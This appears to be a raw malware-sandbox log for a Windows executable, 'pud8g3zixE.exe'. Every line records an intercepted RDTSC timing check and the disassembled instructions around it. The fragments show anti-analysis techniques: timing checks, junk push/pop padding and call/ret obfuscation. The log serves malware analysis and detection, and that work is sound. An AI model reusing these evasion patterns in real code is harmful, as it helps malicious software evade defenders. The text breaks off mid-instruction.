Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B00A second address: 116B016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B0D4 second address: 116B0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B294 second address: 116B29A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B29A second address: 116B2AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jo 00007FD164C54716h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B758 second address: 116B75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B75F second address: 116B765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B82A second address: 116B82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B82E second address: 116B834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116BC2C second address: 116BC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116BDA2 second address: 116BDE0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD164C5471Dh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FD164C54718h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 cld 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jc 00007FD164C54716h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116BDE0 second address: 116BDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116BDE4 second address: 116BDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CC4A second address: 116CC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD164D1C756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CC54 second address: 116CCDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FD164C54718h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FD164C54718h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edx 0x00000049 call 00007FD164C54718h 0x0000004e pop edx 0x0000004f mov dword ptr [esp+04h], edx 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc edx 0x0000005c push edx 0x0000005d ret 0x0000005e pop edx 0x0000005f ret 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CCDF second address: 116CCE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CCE5 second address: 116CCF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FD164C54716h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CCF7 second address: 116CCFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CCFB second address: 116CD1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116CD1A second address: 116CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116DC10 second address: 116DC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116DC16 second address: 116DC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116DC1A second address: 116DC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116DC1E second address: 116DC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116DC2C second address: 116DC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116E615 second address: 116E62E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116E62E second address: 116E634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116E634 second address: 116E6D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD164D1C758h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 add edi, dword ptr [ebp+122D389Dh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FD164D1C758h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 pushad 0x00000049 mov esi, dword ptr [ebp+1245DFE3h] 0x0000004f jmp 00007FD164D1C765h 0x00000054 popad 0x00000055 jmp 00007FD164D1C75Fh 0x0000005a xchg eax, ebx 0x0000005b pushad 0x0000005c pushad 0x0000005d jmp 00007FD164D1C765h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116E6D9 second address: 116E708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD164C54720h 0x0000000b jnp 00007FD164C54716h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD164C5471Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116F1FC second address: 116F254 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD164D1C758h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D3699h] 0x00000013 push 00000000h 0x00000015 call 00007FD164D1C75Bh 0x0000001a sub edi, dword ptr [ebp+12484748h] 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FD164D1C758h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d movzx esi, bx 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push esi 0x00000045 pop esi 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116F254 second address: 116F259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116F259 second address: 116F26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD164D1C756h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116F26D second address: 116F273 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116EFA9 second address: 116EFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116FB96 second address: 116FBA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117112D second address: 117118D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD164D1C758h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov dword ptr [ebp+12459F9Fh], edx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FD164D1C758h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 add edi, dword ptr [ebp+122D375Dh] 0x0000004d push 00000000h 0x0000004f mov edi, dword ptr [ebp+122D38D1h] 0x00000055 xchg eax, ebx 0x00000056 pushad 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117118D second address: 11711B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FD164C54727h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD164C5471Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11711B8 second address: 11711BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1173A2F second address: 1173A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD164C54727h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1173A4F second address: 1173ABC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD164D1C758h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 adc bl, 00000076h 0x00000025 push 00000000h 0x00000027 adc ebx, 1FDA759Bh 0x0000002d push 00000000h 0x0000002f je 00007FD164D1C75Eh 0x00000035 jng 00007FD164D1C758h 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push ecx 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop ecx 0x00000043 jbe 00007FD164D1C758h 0x00000049 pushad 0x0000004a popad 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FD164D1C764h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1173ABC second address: 1173ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C5471Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11704C0 second address: 11704CA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD164D1C75Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11704CA second address: 11704D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11749F5 second address: 11749FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11749FB second address: 1174A75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movsx ebx, ax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FD164C54718h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D32FEh] 0x00000030 mov ebx, 5AA1D091h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FD164C54718h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D1AACh], edi 0x00000057 adc bh, FFFFFFB2h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FD164C54724h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1175A2E second address: 1175A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1175A32 second address: 1175AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1A9Bh], edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FD164C54718h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007FD164C5471Ch 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FD164C54718h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1175AA1 second address: 1175AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1175AA5 second address: 1175AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1176AE6 second address: 1176B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 cmc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FD164D1C758h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D37E9h] 0x0000002b push 00000000h 0x0000002d or edi, 73E44C7Ah 0x00000033 push ebx 0x00000034 stc 0x00000035 pop ebx 0x00000036 xchg eax, esi 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1176B24 second address: 1176B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c jp 00007FD164C5471Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1176B4A second address: 1176B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jno 00007FD164D1C756h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1177AAA second address: 1177B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FD164C54718h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007FD164C54720h 0x00000028 push 00000000h 0x0000002a sub bl, 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FD164C54718h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+1247712Eh] 0x0000004f movzx ebx, cx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pop eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1177B14 second address: 1177B19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1179937 second address: 1179979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 sub dword ptr [ebp+12476F07h], edx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FD164C54718h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edi, ebx 0x0000002a movzx edi, ax 0x0000002d push 00000000h 0x0000002f mov edi, edx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push esi 0x00000037 pop esi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1179979 second address: 117997D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117997D second address: 1179983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1179983 second address: 117998D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD164D1C756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1174CC2 second address: 1174CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117A797 second address: 117A79B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117A79B second address: 117A81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 je 00007FD164C5472Fh 0x0000000f jmp 00007FD164C54729h 0x00000014 pop eax 0x00000015 nop 0x00000016 add ebx, 36349D45h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FD164C54718h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a jc 00007FD164C5471Ch 0x00000040 mov ebx, dword ptr [ebp+122D35BDh] 0x00000046 jmp 00007FD164C5471Fh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FD164C54723h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117A81F second address: 117A823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117A823 second address: 117A829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1177C67 second address: 1177C7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1177C7B second address: 1177C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1177C7F second address: 1177D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FD164D1C75Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FD164D1C758h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+12483B2Bh], ecx 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr [ebp+122D336Bh], edx 0x0000003b mov ebx, dword ptr [ebp+122D36B9h] 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 sub bh, 0000000Eh 0x0000004b mov eax, dword ptr 